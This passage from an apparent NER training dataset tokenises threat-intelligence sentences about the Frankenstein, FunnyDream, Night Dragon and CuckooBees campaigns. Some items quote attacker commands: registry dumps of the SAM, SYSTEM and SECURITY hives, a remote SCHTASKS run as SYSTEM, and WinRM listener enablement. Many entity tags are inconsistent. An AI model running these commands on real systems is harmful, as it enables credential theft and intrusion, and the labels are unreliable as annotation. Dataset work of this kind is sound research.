"O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "HTTP", - "GET", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "ran", - "a", - "command", - "script", - "to", - "set", - "up", - "persistence", - "as", - "a", - "scheduled", - "task", - "named", - "\"WinUpdate\",", - "as", - "well", - "as", - "other", - "encoded", - "commands", - "from", - "the", - "command-line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Frankenstein,", - "the", - "threat", - "actors", - "used", - "WMI", - "queries", - "to", - "check", - "if", - "various", - "security", - "applications", - "were", - "running", - "as", - "well", - "as", - "to", - "determine", - "the", - "operating", - "system", - "version." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "7zr.exe", - "to", - "add", - "collected", - "files", - "to", - "an", - "archive." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "FunnyDream,", - "the", - "threat", - "actors", - "registered", - "a", - "variety", - "of", - "domains." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "FunnyDream,", - "the", - "threat", - "actors", - "likely", - "established", - "an", - "identified", - "email", - "account", - "to", - "register", - "a", - "variety", - "of", - "domains", - "that", - "were", - "used", - "during", - "the", - "campaign." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "downloaded", - "additional", - "droppers", - "and", - "backdoors", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "a", - "new", - "backdoor", - "named", - "FunnyDream." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "Tasklist", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "several", - "tools", - "and", - "batch", - "files", - "to", - "map", - "victims'", - "internal", - "networks." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "Systeminfo", - "to", - "collect", - "information", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "ipconfig", - "for", - "discovery", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "netstat", - "to", - "discover", - "network", - "connections", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "a", - "modified", - "version", - "of", - "the", - "open", - "source", - "PcShare", - "remote", - "administration", - "tool." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "a", - "Visual", - "Basic", - "script", - "to", - "run", - "remote", - "commands." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "`cmd.exe`", - "to", - "execute", - "the", - "wmiexec.vbs", - "script." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "FunnyDream,", - "the", - "threat", - "actors", - "used", - "`wmiexec.vbs`", - "to", - "run", - "remote", - "commands." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "the", - "threat", - "actors", - "collected", - "files", - "and", - "other", - "data", - "from", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "disabled", - "anti-virus", - "and", - "anti-spyware", - "tools", - "in", - "some", - "instances", - "on", - "the", - "victim’s", - "machines.", - "The", - "actors", - "also", - "disabled", - "proxy", - "settings", - "to", - "allow", - "direct", - "communication", - "from", - "victims", - "to", - "the", - "Internet." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "domain", - "accounts", - "to", - "gain", - "further", - "access", - "to", - "victim", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "dynamic", - "DNS", - "services", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "a", - "DLL", - "that", - "included", - "an", - "XOR-encoded", - "section." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "SQL", - "injection", - "exploits", - "against", - "extranet", - "web", - "servers", - "to", - "gain", - "access." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "compromised", - "VPN", - "accounts", - "to", - "gain", - "access", - "to", - "victim", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "company", - "extranet", - "servers", - "as", - "secondary", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "zwShell", - "to", - "establish", - "full", - "remote", - "control", - "of", - "the", - "connected", - "machine", - "and", - "browse", - "the", - "victim", - "file", - "system." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "administrative", - "utilities", - "to", - "deliver", - "Trojan", - "components", - "to", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "RAT", - "malware", - "to", - "exfiltrate", - "email", - "archives." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "enticed", - "users", - "to", - "click", - "on", - "links", - "in", - "spearphishing", - "emails", - "to", - "download", - "malware." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "Trojans", - "from", - "underground", - "hacker", - "websites." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "zwShell", - "to", - "establish", - "full", - "remote", - "control", - "of", - "the", - "connected", - "machine", - "and", - "manipulate", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "pass-the-hash", - "tools", - "to", - "obtain", - "authenticated", - "access", - "to", - "sensitive", - "internal", - "desktops", - "and", - "servers." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "Cain", - "&", - "Abel", - "to", - "crack", - "password", - "hashes." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "several", - "remote", - "administration", - "tools", - "as", - "persistent", - "infiltration", - "channels." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "copied", - "files", - "to", - "company", - "web", - "servers", - "and", - "subsequently", - "downloaded", - "them." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "dumped", - "account", - "hashes", - "using", - "gsecdump." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "purchased", - "hosted", - "services", - "to", - "use", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "compromised", - "web", - "servers", - "to", - "use", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "software", - "packing", - "in", - "its", - "tools." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "sent", - "spearphishing", - "emails", - "containing", - "links", - "to", - "compromised", - "websites", - "where", - "malware", - "was", - "downloaded." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "password", - "cracking", - "and", - "pass-the-hash", - "tools", - "to", - "discover", - "usernames", - "and", - "passwords." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "gsecdump." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "uploaded", - "commonly", - "available", - "hacker", - "tools", - "to", - "compromised", - "web", - "servers." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "compromised", - "VPN", - "accounts", - "to", - "gain", - "access", - "to", - "victim", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Night", - "Dragon,", - "threat", - "actors", - "used", - "zwShell", - "to", - "establish", - "full", - "remote", - "control", - "of", - "the", - "connected", - "machine", - "and", - "run", - "command-line", - "shells." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "Makecab", - "utility", - "to", - "compress", - "and", - "a", - "version", - "of", - "WinRAR", - "to", - "create", - "password-protected", - "archives", - "of", - "stolen", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "executed", - "an", - "encoded", - "VBScript", - "file." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "legitimate", - "Windows", - "services", - "`IKEEXT`", - "and", - "`PrintNotify`", - "to", - "side-load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "collected", - "data,", - "files,", - "and", - "other", - "information", - "from", - "compromised", - "networks." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`dsquery`", - "and", - "`dsget`", - "commands", - "to", - "get", - "domain", - "environment", - "information", - "and", - "to", - "query", - "users", - "in", - "administrative", - "groups." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "compromised", - "domain", - "administrator", - "credentials", - "as", - "part", - "of", - "their", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "exploited", - "multiple", - "vulnerabilities", - "in", - "externally", - "facing", - "servers." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "enabled", - "WinRM", - "over", - "HTTP/HTTPS", - "as", - "a", - "backup", - "persistence", - "mechanism", - "using", - "the", - "following", - "command:", - "`cscript", - "//nologo", - "\"C:\\Windows\\System32\\winrm.vbs\"", - "set", - "winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "`dir", - "c:\\\\`", - "to", - "search", - "for", - "files." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "stroed", - "payloads", - "in", - "Windows", - "CLFS", - "(Common", - "Log", - "File", - "System)", - "transactional", - "logs." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "attackers", - "used", - "a", - "signed", - "kernel", - "rootkit", - "to", - "establish", - "additional", - "persistence." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "user`", - "command", - "to", - "gather", - "account", - "information." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "group`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "renamed", - "a", - "malicious", - "executable", - "to", - "`rundll32.exe`", - "to", - "allow", - "it", - "to", - "blend", - "in", - "with", - "other", - "Windows", - "system", - "files." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "share`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "accounts`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`fsutil", - "fsinfo", - "drives`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`tasklist`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "view`", - "and", - "`ping`", - "commands", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "scheduled", - "tasks", - "to", - "execute", - "batch", - "scripts", - "for", - "lateral", - "movement", - "with", - "the", - "following", - "command:", - "`SCHTASKS", - "/Create", - "/S", - "<IP", - "Address>", - "/U", - "<Username>", - "/p", - "<Password>", - "/SC", - "ONCE", - "/TN", - "test", - "/TR", - "<Path", - "to", - "a", - "Batch", - "File>", - "/ST", - "<Time>", - "/RU", - "SYSTEM.`" - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "leveraged", - "a", - "custom", - "tool", - "to", - "dump", - "OS", - "credentials", - "and", - "used", - "following", - "commands:", - "`reg", - "save", - "HKLM\\\\SYSTEM", - "system.hiv`,", - "`reg", - "save", - "HKLM\\\\SAM", - "sam.hiv`,", - "and", - "`reg", - "save", - "HKLM\\\\SECURITY", - "security.hiv`,", - "to", - "dump", - "SAM,", - "SYSTEM", - "and", - "SECURITY", - "hives." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`systeminfo`", - "command", - "to", - "gather", - "details", - "about", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "`ipconfig`,", - "`nbtstat`,", - "`tracert`,", - "`route", - "print`,", - "and", - "`cat", - "/etc/hosts`", - "commands." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "session`,", - "`net", - "use`,", - "and", - "`netstat`", - "commands", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`query", - "user`", - "and", - "`whoami`", - "commands", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "start`", - "command", - "as", - "part", - "of", - "their", - "initial", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "used", - "the", - "`net", - "time`", - "command", - "as", - "part", - "of", - "their", - "advanced", - "reconnaissance." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "obtained", - "publicly-available", - "JSP", - "code", - "that", - "was", - "used", - "to", - "deploy", - "a", - "webshell", - "onto", - "a", - "compromised", - "server." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "executed", - "an", - "encoded", - "VBScript", - "file", - "using", - "`wscript`", - "and", - "wrote", - "the", - "decoded", - "output", - "to", - "a", - "text", - "file." - ], - "ner_tags": [ - "O", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "Operation", - "CuckooBees,", - "the", - "threat", - "actors", - "enabled", - "HTTP", - "and", - "HTTPS", - "listeners." - 